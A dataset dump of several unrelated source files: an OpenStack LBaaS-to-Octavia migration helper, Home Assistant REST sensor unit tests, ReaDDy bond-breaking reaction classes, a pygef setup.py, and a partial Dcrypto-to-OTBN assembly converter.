member_id = member['id']
lb_member = (
self.os_clients.neutronclient
.show_lbaas_member(member_id, pool_id)
)
self._lb_members[member_id] = lb_member
def collect_lb_info_from_api(self):
self._lb_tree = (
self.os_clients.neutronclient.retrieve_loadbalancer_status(
loadbalancer=self._lb_id)
)
self._lb_details = self.os_clients.neutronclient.show_loadbalancer(
self._lb_id)
fips = self.os_clients.neutronclient.list_floatingips(
port_id=self._lb_details['loadbalancer']['vip_port_id']
).get('floatingips')
if fips:
self._lb_fip = fips[0]
for listener in (
self._lb_tree['statuses']['loadbalancer']['listeners']):
listener_id = listener['id']
lb_listener = (
self.os_clients.neutronclient.show_listener(listener_id)
)
self._lb_listeners[listener_id] = lb_listener
self._pools_deep_scan(listener['pools'])
pools = self._lb_tree['statuses']['loadbalancer'].get('pools', [])
self._pools_deep_scan(pools)
def write_lb_data_file(self, filename):
self._lb_pools = self.fix_duplicate_pool_names(self._lb_pools)
lb_data = {
'lb_id': self._lb_id,
'lb_fip': self._lb_fip,
'lb_tree': self._lb_tree,
'lb_details': self._lb_details,
'lb_listeners': self._lb_listeners,
'lb_pools': self._lb_pools,
'lb_healthmonitors': self._lb_healthmonitors,
'lb_members': self._lb_members
}
with open(filename, 'w') as f:
json.dump(lb_data, f, sort_keys=True, indent=4)
def read_lb_data_file(self, filename):
with open(filename) as f:
lb_data = json.load(f)
        if self._lb_id == lb_data['lb_id']:
            self._lb_fip = lb_data['lb_fip']
            self._lb_tree = lb_data['lb_tree']
            self._lb_details = lb_data['lb_details']
            self._lb_listeners = lb_data['lb_listeners']
            self._lb_pools = lb_data['lb_pools']
            self._lb_healthmonitors = lb_data['lb_healthmonitors']
            self._lb_members = lb_data['lb_members']
        else:
            print('The file content does not match the lb_id you specified')
def fix_duplicate_pool_names(self, lb_pools):
rev_dict = {}
        for k, v in lb_pools.items():
rev_dict.setdefault(v['pool']['name'], set()).add(k)
duplicates = []
for key, values in rev_dict.items():
if len(values) > 1:
duplicates.append({key: values})
for dup in duplicates:
for k, v in dup.items():
count = 1
for ids in v:
lb_pools[ids]['pool']['name'] = "{}_{}".format(k, count)
                    count += 1
return lb_pools
def _build_healthmonitor_obj(self, pool_id):
nlbaas_pool_data = self._lb_pools[pool_id]['pool']
octavia_hm = None
if nlbaas_pool_data.get('healthmonitor_id'):
healthmonitor_id = nlbaas_pool_data['healthmonitor_id']
healthmonitor_data = self._lb_healthmonitors[healthmonitor_id]
octavia_hm = {
'type': healthmonitor_data.get('type'),
'delay': healthmonitor_data.get('delay'),
'expected_codes': healthmonitor_data.get('expected_codes'),
'http_method': healthmonitor_data.get('http_method'),
'max_retries': healthmonitor_data.get('max_retries'),
'timeout': healthmonitor_data.get('timeout'),
'url_path': healthmonitor_data.get('url_path')
}
return octavia_hm
def _build_members_list(self, pool_id):
nlbaas_pool_data = self._lb_pools[pool_id]['pool']
octavia_lb_members = []
for member in nlbaas_pool_data['members']:
member_id = member['id']
member_data = self._lb_members[member_id]['member']
octavia_member = {
'admin_state_up': member_data['admin_state_up'],
'name': member_data['name'],
'address': member_data['address'],
'protocol_port': member_data['protocol_port'],
'subnet_id': member_data['subnet_id'],
'weight': member_data['weight']
}
octavia_lb_members.append(octavia_member)
return octavia_lb_members
def _build_listeners_list(self):
nlbaas_lb_tree = self._lb_tree['statuses']['loadbalancer']
octavia_lb_listeners = []
for listener in nlbaas_lb_tree['listeners']:
listener_id = listener['id']
nlbaas_listener_data = self._lb_listeners[listener_id]['listener']
default_pool = None
pool_id = nlbaas_listener_data['default_pool_id']
if pool_id is not None and pool_id not in self._lb_def_pool_ids:
self._lb_def_pool_ids.append(pool_id)
nlbaas_default_pool_data = \
self._lb_pools[pool_id]['pool']
default_pool_name = "legacy-%s" % nlbaas_default_pool_data['id']
if nlbaas_default_pool_data['name']:
default_pool_name = nlbaas_default_pool_data['name']
default_pool = {
'name': default_pool_name,
'protocol': nlbaas_default_pool_data['protocol'],
'lb_algorithm': nlbaas_default_pool_data['lb_algorithm'],
'healthmonitor': self._build_healthmonitor_obj(pool_id) or '',
'members': self._build_members_list(pool_id) or '',
}
listener_name = nlbaas_listener_data['name']
if not listener_name:
listener_name = "listener-%s" % nlbaas_listener_data['id']
octavia_listener = {
'name': listener_name,
'protocol': nlbaas_listener_data['protocol'],
'protocol_port': nlbaas_listener_data['protocol_port'],
'default_pool': default_pool,
}
octavia_lb_listeners.append(octavia_listener)
return octavia_lb_listeners
def _build_pools_list(self):
nlbaas_lb_tree = self._lb_tree['statuses']['loadbalancer']
octavia_lb_pools = []
for pool in nlbaas_lb_tree.get('pools', []):
pool_id = pool['id']
if pool_id in self._lb_def_pool_ids:
continue
else:
nlbaas_pool_data = self._lb_pools[pool_id]['pool']
pool_name = nlbaas_pool_data['name']
if not pool_name:
pool_name = "pool-%s" % nlbaas_pool_data['id']
octavia_pool = {
'name': pool_name,
'description': nlbaas_pool_data['description'],
'protocol': nlbaas_pool_data['protocol'],
'lb_algorithm': nlbaas_pool_data['lb_algorithm'],
'healthmonitor':
self._build_healthmonitor_obj(pool_id) or '',
'members': self._build_members_list(pool_id) or ''
}
octavia_lb_pools.append(octavia_pool)
return octavia_lb_pools
def build_octavia_lb_tree(self, reuse_vip):
nlbaas_lb_details = self._lb_details['loadbalancer']
octavia_lb_tree = {
'loadbalancer': {
'name': nlbaas_lb_details['name'],
'description': nlbaas_lb_details['description'],
'admin_state_up': nlbaas_lb_details['admin_state_up'],
'project_id': nlbaas_lb_details['tenant_id'],
'flavor_id': '',
'listeners': self._build_listeners_list(),
'pools': self._build_pools_list(),
'vip_subnet_id': nlbaas_lb_details['vip_subnet_id'],
'vip_address': nlbaas_lb_details['vip_address']
if reuse_vip else ''
}
}
utils._remove_empty(octavia_lb_tree)
return octavia_lb_tree
def octavia_load_balancer_create(self, reuse_vip):
for healthmonitor_id, healthmonitor_data in self._lb_healthmonitors.items():
try:
self.os_clients.neutronclient.delete_lbaas_healthmonitor(healthmonitor_id)
except neutronclient.common.exceptions.NotFound:
pass
for pool_id, pool_data in self._lb_pools.items():
try:
self.os_clients.neutronclient.delete_lbaas_pool(pool_id)
except neutronclient.common.exceptions.NotFound:
pass
for listener_id, listener_data in self._lb_listeners.items():
try:
self.os_clients.neutronclient.delete_listener(listener_id)
except neutronclient.common.exceptions.NotFound:
pass
try:
self.os_clients.neutronclient.delete_loadbalancer(self._lb_id)
except neutronclient.common.exceptions.NotFound:
pass
octavia_lb_tree = self.build_octavia_lb_tree(reuse_vip)
pprint(octavia_lb_tree)
new_lb = self.os_clients.octaviaclient.load_balancer_create(
json=octavia_lb_tree)
if self._lb_fip:
vip_port_id = new_lb['loadbalancer']['vip_port_id']
self.os_clients.neutronclient.update_floatingip(
self._lb_fip['id'],
{"floatingip": {"port_id": vip_port_id}}
)
pprint(new_lb)
pprint(self._lb_fip)
| true
| true
|
1c4910927a53cf04a6f0417f5960276458b1c42a
| 8,047
|
py
|
Python
|
tests/components/sensor/test_rest.py
|
loraxx753/skynet
|
86a1b0a6c6a3f81bc92d4f61de6a9a6b9f964543
|
[
"Apache-2.0"
] | 1
|
2021-01-02T14:13:46.000Z
|
2021-01-02T14:13:46.000Z
|
tests/components/sensor/test_rest.py
|
bytebility/home-assistant
|
6015274ee2486f797fd6ee8f5f2074a601953e03
|
[
"MIT"
] | 1
|
2017-03-10T22:17:06.000Z
|
2017-03-10T22:17:06.000Z
|
tests/components/sensor/test_rest.py
|
bytebility/home-assistant
|
6015274ee2486f797fd6ee8f5f2074a601953e03
|
[
"MIT"
] | 2
|
2018-06-03T11:14:44.000Z
|
2018-11-04T18:18:12.000Z
|
"""The tests for the REST switch platform."""
import unittest
from unittest.mock import patch, Mock
import requests
from requests.exceptions import Timeout, MissingSchema, RequestException
import requests_mock
from homeassistant.bootstrap import setup_component
import homeassistant.components.sensor as sensor
import homeassistant.components.sensor.rest as rest
from homeassistant.const import STATE_UNKNOWN
from homeassistant.helpers.config_validation import template
from tests.common import get_test_home_assistant, assert_setup_component
class TestRestSwitchSetup(unittest.TestCase):
"""Tests for setting up the REST switch platform."""
def setUp(self):
"""Setup things to be run when tests are started."""
self.hass = get_test_home_assistant()
def tearDown(self):
"""Stop everything that was started."""
self.hass.stop()
def test_setup_missing_config(self):
"""Test setup with configuration missing required entries."""
with assert_setup_component(0):
assert setup_component(self.hass, sensor.DOMAIN, {
'sensor': {'platform': 'rest'}})
def test_setup_missing_schema(self):
"""Test setup with resource missing schema."""
with self.assertRaises(MissingSchema):
rest.setup_platform(self.hass, {
'platform': 'rest',
'resource': 'localhost',
'method': 'GET'
}, None)
@patch('requests.Session.send',
side_effect=requests.exceptions.ConnectionError())
def test_setup_failed_connect(self, mock_req):
"""Test setup when connection error occurs."""
self.assertFalse(rest.setup_platform(self.hass, {
'platform': 'rest',
'resource': 'http://localhost',
}, None))
@patch('requests.Session.send', side_effect=Timeout())
def test_setup_timeout(self, mock_req):
"""Test setup when connection timeout occurs."""
self.assertFalse(rest.setup_platform(self.hass, {
'platform': 'rest',
'resource': 'http://localhost',
}, None))
@requests_mock.Mocker()
def test_setup_minimum(self, mock_req):
"""Test setup with minimum configuration."""
mock_req.get('http://localhost', status_code=200)
self.assertTrue(setup_component(self.hass, 'sensor', {
'sensor': {
'platform': 'rest',
'resource': 'http://localhost'
}
}))
self.assertEqual(2, mock_req.call_count)
        assert_setup_component(1, 'sensor')
@requests_mock.Mocker()
def test_setup_get(self, mock_req):
"""Test setup with valid configuration."""
mock_req.get('http://localhost', status_code=200)
self.assertTrue(setup_component(self.hass, 'sensor', {
'sensor': {
'platform': 'rest',
'resource': 'http://localhost',
'method': 'GET',
'value_template': '{{ value_json.key }}',
'name': 'foo',
'unit_of_measurement': 'MB',
'verify_ssl': 'true',
'authentication': 'basic',
'username': 'my username',
'password': 'my password',
'headers': {'Accept': 'application/json'}
}
}))
self.assertEqual(2, mock_req.call_count)
assert_setup_component(1, 'sensor')
@requests_mock.Mocker()
def test_setup_post(self, mock_req):
"""Test setup with valid configuration."""
mock_req.post('http://localhost', status_code=200)
self.assertTrue(setup_component(self.hass, 'sensor', {
'sensor': {
'platform': 'rest',
'resource': 'http://localhost',
'method': 'POST',
'value_template': '{{ value_json.key }}',
'payload': '{ "device": "toaster"}',
'name': 'foo',
'unit_of_measurement': 'MB',
'verify_ssl': 'true',
'authentication': 'basic',
'username': 'my username',
'password': 'my password',
'headers': {'Accept': 'application/json'}
}
}))
self.assertEqual(2, mock_req.call_count)
assert_setup_component(1, 'sensor')
class TestRestSensor(unittest.TestCase):
"""Tests for REST sensor platform."""
def setUp(self):
"""Setup things to be run when tests are started."""
self.hass = get_test_home_assistant()
self.initial_state = 'initial_state'
self.rest = Mock('rest.RestData')
self.rest.update = Mock('rest.RestData.update',
side_effect=self.update_side_effect(
'{ "key": "' + self.initial_state + '" }'))
self.name = 'foo'
self.unit_of_measurement = 'MB'
self.value_template = template('{{ value_json.key }}')
self.value_template.hass = self.hass
self.sensor = rest.RestSensor(self.hass, self.rest, self.name,
self.unit_of_measurement,
self.value_template)
def tearDown(self):
"""Stop everything that was started."""
self.hass.stop()
def update_side_effect(self, data):
"""Side effect function for mocking RestData.update()."""
self.rest.data = data
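    # Note on the mocking pattern above: update_side_effect(...) is evaluated
    # eagerly while the Mock is constructed, so self.rest.data is seeded
    # immediately; the tests then call sensor.update() and read sensor.state.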
def test_name(self):
"""Test the name."""
self.assertEqual(self.name, self.sensor.name)
def test_unit_of_measurement(self):
"""Test the unit of measurement."""
self.assertEqual(self.unit_of_measurement,
self.sensor.unit_of_measurement)
def test_state(self):
"""Test the initial state."""
self.assertEqual(self.initial_state, self.sensor.state)
def test_update_when_value_is_none(self):
"""Test state gets updated to unknown when sensor returns no data."""
self.rest.update = Mock('rest.RestData.update',
side_effect=self.update_side_effect(None))
self.sensor.update()
self.assertEqual(STATE_UNKNOWN, self.sensor.state)
def test_update_when_value_changed(self):
"""Test state gets updated when sensor returns a new status."""
self.rest.update = Mock('rest.RestData.update',
side_effect=self.update_side_effect(
'{ "key": "updated_state" }'))
self.sensor.update()
self.assertEqual('updated_state', self.sensor.state)
def test_update_with_no_template(self):
"""Test update when there is no value template."""
self.rest.update = Mock('rest.RestData.update',
side_effect=self.update_side_effect(
'plain_state'))
self.sensor = rest.RestSensor(self.hass, self.rest, self.name,
self.unit_of_measurement, None)
self.sensor.update()
self.assertEqual('plain_state', self.sensor.state)
class TestRestData(unittest.TestCase):
"""Tests for RestData."""
def setUp(self):
"""Setup things to be run when tests are started."""
self.method = "GET"
self.resource = "http://localhost"
self.verify_ssl = True
self.rest = rest.RestData(self.method, self.resource, None, None, None,
self.verify_ssl)
@requests_mock.Mocker()
def test_update(self, mock_req):
"""Test update."""
mock_req.get('http://localhost', text='test data')
self.rest.update()
self.assertEqual('test data', self.rest.data)
@patch('requests.Session', side_effect=RequestException)
def test_update_request_exception(self, mock_req):
"""Test update when a request exception occurs."""
self.rest.update()
self.assertEqual(None, self.rest.data)
| 38.319048
| 79
| 0.58643
|
import unittest
from unittest.mock import patch, Mock
import requests
from requests.exceptions import Timeout, MissingSchema, RequestException
import requests_mock
from homeassistant.bootstrap import setup_component
import homeassistant.components.sensor as sensor
import homeassistant.components.sensor.rest as rest
from homeassistant.const import STATE_UNKNOWN
from homeassistant.helpers.config_validation import template
from tests.common import get_test_home_assistant, assert_setup_component
class TestRestSwitchSetup(unittest.TestCase):
def setUp(self):
self.hass = get_test_home_assistant()
def tearDown(self):
self.hass.stop()
def test_setup_missing_config(self):
with assert_setup_component(0):
assert setup_component(self.hass, sensor.DOMAIN, {
'sensor': {'platform': 'rest'}})
def test_setup_missing_schema(self):
with self.assertRaises(MissingSchema):
rest.setup_platform(self.hass, {
'platform': 'rest',
'resource': 'localhost',
'method': 'GET'
}, None)
@patch('requests.Session.send',
side_effect=requests.exceptions.ConnectionError())
def test_setup_failed_connect(self, mock_req):
self.assertFalse(rest.setup_platform(self.hass, {
'platform': 'rest',
'resource': 'http://localhost',
}, None))
@patch('requests.Session.send', side_effect=Timeout())
def test_setup_timeout(self, mock_req):
self.assertFalse(rest.setup_platform(self.hass, {
'platform': 'rest',
'resource': 'http://localhost',
}, None))
@requests_mock.Mocker()
def test_setup_minimum(self, mock_req):
mock_req.get('http://localhost', status_code=200)
self.assertTrue(setup_component(self.hass, 'sensor', {
'sensor': {
'platform': 'rest',
'resource': 'http://localhost'
}
}))
self.assertEqual(2, mock_req.call_count)
        assert_setup_component(1, 'sensor')
@requests_mock.Mocker()
def test_setup_get(self, mock_req):
mock_req.get('http://localhost', status_code=200)
self.assertTrue(setup_component(self.hass, 'sensor', {
'sensor': {
'platform': 'rest',
'resource': 'http://localhost',
'method': 'GET',
'value_template': '{{ value_json.key }}',
'name': 'foo',
'unit_of_measurement': 'MB',
'verify_ssl': 'true',
'authentication': 'basic',
'username': 'my username',
'password': 'my password',
'headers': {'Accept': 'application/json'}
}
}))
self.assertEqual(2, mock_req.call_count)
assert_setup_component(1, 'sensor')
@requests_mock.Mocker()
def test_setup_post(self, mock_req):
mock_req.post('http://localhost', status_code=200)
self.assertTrue(setup_component(self.hass, 'sensor', {
'sensor': {
'platform': 'rest',
'resource': 'http://localhost',
'method': 'POST',
'value_template': '{{ value_json.key }}',
'payload': '{ "device": "toaster"}',
'name': 'foo',
'unit_of_measurement': 'MB',
'verify_ssl': 'true',
'authentication': 'basic',
'username': 'my username',
'password': 'my password',
'headers': {'Accept': 'application/json'}
}
}))
self.assertEqual(2, mock_req.call_count)
assert_setup_component(1, 'sensor')
class TestRestSensor(unittest.TestCase):
def setUp(self):
self.hass = get_test_home_assistant()
self.initial_state = 'initial_state'
self.rest = Mock('rest.RestData')
self.rest.update = Mock('rest.RestData.update',
side_effect=self.update_side_effect(
'{ "key": "' + self.initial_state + '" }'))
self.name = 'foo'
self.unit_of_measurement = 'MB'
self.value_template = template('{{ value_json.key }}')
self.value_template.hass = self.hass
self.sensor = rest.RestSensor(self.hass, self.rest, self.name,
self.unit_of_measurement,
self.value_template)
def tearDown(self):
self.hass.stop()
def update_side_effect(self, data):
self.rest.data = data
def test_name(self):
self.assertEqual(self.name, self.sensor.name)
def test_unit_of_measurement(self):
self.assertEqual(self.unit_of_measurement,
self.sensor.unit_of_measurement)
def test_state(self):
self.assertEqual(self.initial_state, self.sensor.state)
def test_update_when_value_is_none(self):
self.rest.update = Mock('rest.RestData.update',
side_effect=self.update_side_effect(None))
self.sensor.update()
self.assertEqual(STATE_UNKNOWN, self.sensor.state)
def test_update_when_value_changed(self):
self.rest.update = Mock('rest.RestData.update',
side_effect=self.update_side_effect(
'{ "key": "updated_state" }'))
self.sensor.update()
self.assertEqual('updated_state', self.sensor.state)
def test_update_with_no_template(self):
self.rest.update = Mock('rest.RestData.update',
side_effect=self.update_side_effect(
'plain_state'))
self.sensor = rest.RestSensor(self.hass, self.rest, self.name,
self.unit_of_measurement, None)
self.sensor.update()
self.assertEqual('plain_state', self.sensor.state)
class TestRestData(unittest.TestCase):
def setUp(self):
self.method = "GET"
self.resource = "http://localhost"
self.verify_ssl = True
self.rest = rest.RestData(self.method, self.resource, None, None, None,
self.verify_ssl)
@requests_mock.Mocker()
def test_update(self, mock_req):
mock_req.get('http://localhost', text='test data')
self.rest.update()
self.assertEqual('test data', self.rest.data)
@patch('requests.Session', side_effect=RequestException)
def test_update_request_exception(self, mock_req):
self.rest.update()
self.assertEqual(None, self.rest.data)
| true
| true
|
1c4911bff2f56abbbc4f11c72c3e927e4d9f64ad
| 7,231
|
py
|
Python
|
hydrogels/reactions/structural.py
|
debeshmandal/hydrogels
|
3ca065c21ae834ab350f9fae78cee611f945d853
|
[
"MIT"
] | 3
|
2020-05-13T01:07:30.000Z
|
2021-02-12T13:37:23.000Z
|
hydrogels/reactions/structural.py
|
debeshmandal/hydrogels
|
3ca065c21ae834ab350f9fae78cee611f945d853
|
[
"MIT"
] | 24
|
2020-06-04T13:48:57.000Z
|
2021-12-31T18:46:52.000Z
|
hydrogels/reactions/structural.py
|
debeshmandal/hydrogels
|
3ca065c21ae834ab350f9fae78cee611f945d853
|
[
"MIT"
] | 1
|
2020-07-23T17:15:23.000Z
|
2020-07-23T17:15:23.000Z
|
#!/usr/bin/env python
"""Contains structural reaction classes for use in ReaDDy to declare
structural topology reactions
Classes:
BondBreaking: container for bond breaking schemes
"""
from typing import Callable
import readdy
from softnanotools.logger import Logger
logger = Logger(__name__)
class StructuralReaction:
def __init__(
self,
reaction_function,
name: str = 'reaction',
topology_type: str = 'molecule',
rate_function: Callable = lambda x: 10000.0,
):
self.name = name
self.topology_type = topology_type
self.reaction_function = reaction_function
self.rate_function = rate_function
def __call__(self, topology):
return self.reaction_function(topology)
def register(self, system: readdy.ReactionDiffusionSystem):
"""Registers the structural reaction to a given system"""
system.topologies.add_structural_reaction(
self.name,
topology_type=self.topology_type,
reaction_function=self,
rate_function=self.rate_function,
)
return
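# Minimal usage sketch (the ReaDDy `system` object is assumed to exist):
#   reaction = BondBreaking('R', 'I', 'P').polymer
#   reaction.register(system)  # shorthand for the manual registration shown
#                              # in the BondBreaking docstring below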
class BondBreaking:
"""Class to store different Bond Breaking structural reactions
for use in ReaDDy.
Converts bonded [reactant] topology particles to [product] particles
via [intermediate] topology particles
[intermediate] topology particles are typically created in spatial
reactions, and BondBreaking provides a mechanism and functionality
to convert these to [product] particles.
There are currently two reaction schemes:
- polymer
Generic Bond breaking with an arbitrary number of particles
in a topology
- diatomic:
Bond breaking when a topology has only two particles
Example:
```python
reaction = BondBreaking('R', 'I', 'P').polymer
...
    system.topologies.add_structural_reaction(
        name=reaction.name,
        topology_type=reaction.topology_type,
        reaction_function=reaction,
        rate_function=reaction.rate_function,
    )
```
It is quite easy to overwrite the `name`, `topology_type`, and
`rate_function` parameters manually, however we believe that users
may prefer storing their reaction metadata within the same class
as their reaction.
Parameters:
        reactant: name of reactant topology species
        intermediate: name of intermediate topology species
        product: name of product topology species
name (optional): name of reaction type
rate_function (optional): rate function for use in ReaDDy
topology_type (optional): topology to execute reaction on
Attributes:
        reactant: name of reactant topology species
        intermediate: name of intermediate topology species
        product: name of product topology species
name: name of reaction type
rate_function: rate function for use in ReaDDy
topology_type: topology to execute reaction on
diatomic: Bond breaking when a topology has only two particles
polymer: Bond breaking with an arbitrary number of particles
"""
def __init__(
self,
reactant,
intermediate,
product,
name: str = 'bond_breaking',
rate_function: Callable = lambda x: 10000,
topology_type: str = 'molecule',
):
# important variables
self.reactant = reactant
self.intermediate = intermediate
self.product = product
# optional variables that are useful for storage
# but not essential, and easy to override
self.name = name
self.rate_function = rate_function
self.topology_type = topology_type
@property
def diatomic(self) -> Callable:
"""Returns a bond breaking function that converts a single
diatomic molecule to two product particles. The diatomic
molecule should contain a topology particle that corresponds
to BondBreaking.intermediate"""
def fn(topology) -> readdy.StructuralReactionRecipe:
# get reaction recipe
recipe = readdy.StructuralReactionRecipe(topology)
# get the vertices of the topology
vertices = topology.get_graph().get_vertices()
# sort types (either A or B) for easier analysis
types = [topology.particle_type_of_vertex(v) for v in vertices]
# if B is present then change both particles to C
# and delete bond by using recipe.separate_vertex
if self.intermediate in types:
recipe.separate_vertex(0)
recipe.change_particle_type(vertices[0], self.product)
recipe.change_particle_type(vertices[1], self.product)
# return the configured recipe
return recipe
return StructuralReaction(
fn,
name=self.name,
topology_type=self.topology_type,
rate_function=self.rate_function
)
@property
def polymer(self) -> Callable:
def fn(topology) -> readdy.StructuralReactionRecipe:
recipe = readdy.StructuralReactionRecipe(topology)
# it is possible for there to be a lone particle in a topology
# when reactions happen very quickly, this step ensures that
# these are converted to [product] particles which are not
# topology-bound
vertices = topology.get_graph().get_vertices()
if len(vertices) == 1:
recipe.separate_vertex(0)
recipe.change_particle_type(vertices[0], self.product)
# register R-I -> P + P reaction
elif len(vertices) == 2:
types = [topology.particle_type_of_vertex(v) for v in vertices]
if self.intermediate in types:
recipe.separate_vertex(0)
recipe.change_particle_type(vertices[0], self.product)
recipe.change_particle_type(vertices[1], self.product)
# register -R-I-R- -> -R + R-R-
else:
# insert reaction
edges = topology.get_graph().get_edges()
for edge in edges:
if topology.particle_type_of_vertex(edge[0]) \
== self.intermediate:
# remove the bond and convert back to reactant
recipe.remove_edge(edge[0], edge[1])
recipe.change_particle_type(edge[0], self.reactant)
elif topology.particle_type_of_vertex(edge[1]) \
== self.intermediate:
# do the same but with the other particle
# since that is the one that is an intermediate
recipe.remove_edge(edge[0], edge[1])
recipe.change_particle_type(edge[1], self.reactant)
return recipe
return StructuralReaction(
fn,
name=self.name,
topology_type=self.topology_type,
rate_function=self.rate_function
)
if __name__ == '__main__':
import doctest
doctest.testmod()
| 36.336683
| 79
| 0.628544
|
from typing import Callable
import readdy
from softnanotools.logger import Logger
logger = Logger(__name__)
class StructuralReaction:
def __init__(
self,
reaction_function,
name: str = 'reaction',
topology_type: str = 'molecule',
rate_function: Callable = lambda x: 10000.0,
):
self.name = name
self.topology_type = topology_type
self.reaction_function = reaction_function
self.rate_function = rate_function
def __call__(self, topology):
return self.reaction_function(topology)
def register(self, system: readdy.ReactionDiffusionSystem):
system.topologies.add_structural_reaction(
self.name,
topology_type=self.topology_type,
reaction_function=self,
rate_function=self.rate_function,
)
return
class BondBreaking:
def __init__(
self,
reactant,
intermediate,
product,
name: str = 'bond_breaking',
rate_function: Callable = lambda x: 10000,
topology_type: str = 'molecule',
):
self.reactant = reactant
self.intermediate = intermediate
self.product = product
self.name = name
self.rate_function = rate_function
self.topology_type = topology_type
@property
def diatomic(self) -> Callable:
def fn(topology) -> readdy.StructuralReactionRecipe:
recipe = readdy.StructuralReactionRecipe(topology)
vertices = topology.get_graph().get_vertices()
types = [topology.particle_type_of_vertex(v) for v in vertices]
if self.intermediate in types:
recipe.separate_vertex(0)
recipe.change_particle_type(vertices[0], self.product)
recipe.change_particle_type(vertices[1], self.product)
return recipe
return StructuralReaction(
fn,
name=self.name,
topology_type=self.topology_type,
rate_function=self.rate_function
)
@property
def polymer(self) -> Callable:
def fn(topology) -> readdy.StructuralReactionRecipe:
recipe = readdy.StructuralReactionRecipe(topology)
vertices = topology.get_graph().get_vertices()
if len(vertices) == 1:
recipe.separate_vertex(0)
recipe.change_particle_type(vertices[0], self.product)
elif len(vertices) == 2:
types = [topology.particle_type_of_vertex(v) for v in vertices]
if self.intermediate in types:
recipe.separate_vertex(0)
recipe.change_particle_type(vertices[0], self.product)
recipe.change_particle_type(vertices[1], self.product)
else:
edges = topology.get_graph().get_edges()
for edge in edges:
if topology.particle_type_of_vertex(edge[0]) \
== self.intermediate:
recipe.remove_edge(edge[0], edge[1])
recipe.change_particle_type(edge[0], self.reactant)
elif topology.particle_type_of_vertex(edge[1]) \
== self.intermediate:
recipe.remove_edge(edge[0], edge[1])
recipe.change_particle_type(edge[1], self.reactant)
return recipe
return StructuralReaction(
fn,
name=self.name,
topology_type=self.topology_type,
rate_function=self.rate_function
)
if __name__ == '__main__':
import doctest
doctest.testmod()
| true
| true
|
1c491211333554359546b998ef9c6268840541d5
| 487
|
py
|
Python
|
setup.py
|
cemsbv/pygef
|
e83811744328778bbfc808424121bbf3a64e3ff1
|
[
"MIT"
] | 3
|
2021-11-10T09:44:01.000Z
|
2022-02-01T07:55:03.000Z
|
setup.py
|
cemsbv/pygef
|
e83811744328778bbfc808424121bbf3a64e3ff1
|
[
"MIT"
] | 79
|
2021-10-11T13:40:12.000Z
|
2022-03-31T10:26:47.000Z
|
setup.py
|
cemsbv/pygef
|
e83811744328778bbfc808424121bbf3a64e3ff1
|
[
"MIT"
] | 4
|
2021-11-25T13:38:30.000Z
|
2022-02-18T10:27:58.000Z
|
from setuptools import setup
exec(open("pygef/_version.py").read())
setup(
name="pygef",
version=__version__,
author="Ritchie Vink",
author_email="ritchie46@gmail.com",
url="https://github.com/cemsbv/pygef",
license="mit",
packages=["pygef", "pygef.been_jefferies", "pygef.robertson"],
install_requires=[
"polars>= 0.9.5",
"matplotlib>= 3.4.2",
"lxml==4.8.0",
],
python_requires=">=3.7",
include_package_data=True,
)
| 23.190476
| 66
| 0.616016
|
from setuptools import setup
exec(open("pygef/_version.py").read())
setup(
name="pygef",
version=__version__,
author="Ritchie Vink",
author_email="ritchie46@gmail.com",
url="https://github.com/cemsbv/pygef",
license="mit",
packages=["pygef", "pygef.been_jefferies", "pygef.robertson"],
install_requires=[
"polars>= 0.9.5",
"matplotlib>= 3.4.2",
"lxml==4.8.0",
],
python_requires=">=3.7",
include_package_data=True,
)
| true
| true
|
1c4912ab3403b34e11296fdf8cb4133a2a11c301
| 9,071
|
py
|
Python
|
convert2otbn.py
|
felixmiller/ot-dsim
|
1d33f9cac6565b85691cd905b1eb195b341ec3d2
|
[
"Apache-2.0"
] | null | null | null |
convert2otbn.py
|
felixmiller/ot-dsim
|
1d33f9cac6565b85691cd905b1eb195b341ec3d2
|
[
"Apache-2.0"
] | null | null | null |
convert2otbn.py
|
felixmiller/ot-dsim
|
1d33f9cac6565b85691cd905b1eb195b341ec3d2
|
[
"Apache-2.0"
] | 1
|
2020-07-24T06:52:36.000Z
|
2020-07-24T06:52:36.000Z
|
# Copyright lowRISC contributors.
# Licensed under the Apache License, Version 2.0, see LICENSE for details.
# SPDX-License-Identifier: Apache-2.0
import argparse
import logging
from bignum_lib.sim_helpers import ins_objects_from_asm_file
from bignum_lib.disassembler import Disassembler
from bignum_lib.instructions import ILoop
from bignum_lib.instructions_ot import IOtLoop
from bignum_lib.instructions_ot import IOtLoopi
from bignum_lib.instructions_ot import IOtJal
from bignum_lib.instructions import ICall
from bignum_lib.instructions_ot import IOtBeq
from bignum_lib.instructions_ot import IOtBne
from bignum_lib.instructions import IBranch
from bignum_lib.instructions_ot import IOtLui
from bignum_lib.instructions_ot import IOtAddi
from bignum_lib.instructions import IMovi
def handle_movi_combined(ins1, ins2):
    # Placeholder only: combined handling of two movi instructions that write
    # the lower/upper 16 bits of the same limb is not implemented yet (see
    # the commented-out block in main()).
    return
def main():
logging.basicConfig(level=logging.DEBUG)
argparser = argparse.ArgumentParser(description='Dcrypto to OTBN assembly converter')
argparser.add_argument('infile', help="Input Assembly file")
argparser.add_argument('-a', '--addresses',
help='print address for each instruction',
action='store_true')
argparser.add_argument('-w', '--dmem-word-addressing',
help='use WLEN word addressing for dmem instead of byte addressing',
action='store_true')
    args = argparser.parse_args()
try:
infile = open(args.infile)
except IOError:
print('Could not open file ' + args.infile)
exit()
"""Load binary executable from file"""
byte_addressing = not args.dmem_word_addressing
ins_objects, ctx, _ = ins_objects_from_asm_file(infile, dmem_byte_addressing=byte_addressing)
infile.close()
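    # Relocation bookkeeping for the conversion below:
    #   ins_objects_push[i] - number of extra instructions inserted before
    #                         original address i; used later to relocate
    #                         labels, loop ranges and branch/jump targets.
    #   ins_objects_len[i]  - number of OTBN instructions that original
    #                         instruction i expanded into (1 if one-to-one).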
ins_objects_push = [0]*len(ins_objects)
ins_objects_len = [1] * len(ins_objects)
otbn_ins_obj_list = []
ignore_next = False
for idx, item in enumerate(ins_objects):
if ignore_next:
ignore_next = False
continue
# The movi instruction is a special case, since two (subsequent) instructions have to be considered together
'''
if isinstance(item, IMovi):
if idx != len(ins_objects) - 1:
if isinstance(ins_objects[idx+1], IMovi):
if item.rd == ins_objects[idx+1].rd and item.fun == ins_objects[idx+1].fun:
if item.slice != ins_objects[idx+1].slice:
# two subsequent movi instructions are adressing the same limb, one the lower 16b, one
# the upper 16b -> Handle them together to be replaced by one single combination of
# ADDI and LUI
logging.info('Combining two movi instructions (Address '
+ str(idx) + ' and ' + str(idx+1) + ').')
handle_movi_combined(item, ins_objects[idx+1])
otbn_ins_obj = item.convert_otbn(idx)
otbn_ins_obj_list.extend(otbn_ins_obj)
ignore_next = True
continue'''
